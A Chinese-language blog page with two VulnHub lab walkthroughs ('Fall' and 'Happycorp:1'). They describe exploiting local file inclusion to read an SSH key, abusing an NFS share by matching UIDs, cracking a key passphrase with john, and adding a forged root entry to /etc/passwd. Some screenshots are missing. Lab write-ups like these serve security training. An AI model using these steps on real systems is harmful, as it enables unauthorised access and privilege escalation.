Vulnhub Fall Walkthrough

Posted 2023-04-16 ZywOo

Recon

二层本地扫描，发现目标靶机。

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.80.0/24 

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                         

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                                                                           
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.80.1    00:50:56:c0:00:08      1      60  VMware, Inc.                                                                                            
 192.168.80.2    00:50:56:ed:65:ac      1      60  VMware, Inc.                                                                                            
 192.168.80.137  00:0c:29:86:79:b5      1      60  VMware, Inc.                                                                                            
 192.168.80.254  00:50:56:ed:ad:66      1      60  VMware, Inc.   

使用nmap三层扫描目标端口。

发现目标开启了HTTP服务，我们使用目录扫描工具进行扫描。

需要注意的是，最好使用dirbuster的字典进行扫描，使用dirb的默认字典无法扫描出需要的文件。

我们找到了几个可疑的文件。我们尝试访问，phpinfo.php没有有效信息，我们把重点放在test.php。我们尝试访问test.php，网页显示我们需要传递一个参数。

我们尝试页面是否包含LFI漏洞。从下面的显示我们可以得出，该文件包含了LFI漏洞，且目标系统中包含了qiu这个用户。

接下来，我们尝试使用qiu登录目标机器，但我们目标系统只允许使用公私钥加密登录。

我们尝试利用LFI读取qiu用户的私钥，并保存在本地。

使用私钥进行登录。

查看历史命令文件，发现了用户的密码。

发现用户可以sudo执行任何命令，提权成功

Happycorp:1 Vulnhub Walkthrough

靶机链接：

https://www.vulnhub.com/entry/happycorp-1,296/

网络主机扫描：：：

 

主机端口扫描：

 

NFS文件系统，尝试挂载试试

mount -t nfs 10.10.202.135:/home/karl /mnt

 

提示没权限打开。这里暂时放一放，看看HTTP方面，有个admin.php后台能不能上传，拿shell

 

 

 

web页面收集用户信息：

heather 提示密码错误
carolyn 账户不存在
rodney  账户不存在
jennifer 账户不存在

存在账户枚举，这里进行爆破top 500 weak password 没成功，放弃

尝试post username SQL注入，失败

继续看看NFS如何能读取到.SSH文件夹下的内容

 

尝试看下UID，我们能否创建UID相同的用户去读取文件呢

╰─ groupadd --gid 1001 test

╰─ useradd --uid 1001 --group test pentest

 

获取到了秘钥，复制下来，保存成文件，尝试使用用户karl用户登录，结果。。。。

 

这秘钥密码是啥，先爆破试试，工具 ssh2john.py

https://github.com/koboi137/john

python ssh2john.py /root/key.txt > /root/sshkey_login

╰─ john --wordlist=/usr/share/wordlists/rockyou.txt sshkey_login

 

成功登录

 

接下来就是进行提权操作，不是标准的shell，这里重新连接，指定shell

╰─ ssh -i key.txt karl@10.10.202.135 -t "/bin/sh"

find / -perm -u=s -type f 2>/dev/null

 

这里的思路就是复制passwd文件，复制到NFS文件共享目录，然后增加明文密码权限，然后复制回去替换，切换用户，获取root权限

openssl passwd -1 -salt hack404 pass123

$1$hack404$auqhHGf8QPcNJkxkSEm1O0

hack404:$1$hack404$auqhHGf8QPcNJkxkSEm1O0:0:0:root:/root:/bin/bash

 

 

登录成功去看下amdin.php文件的密码到底是什么玩意

 

登录试试

 

感觉有包含漏洞

OVER !!!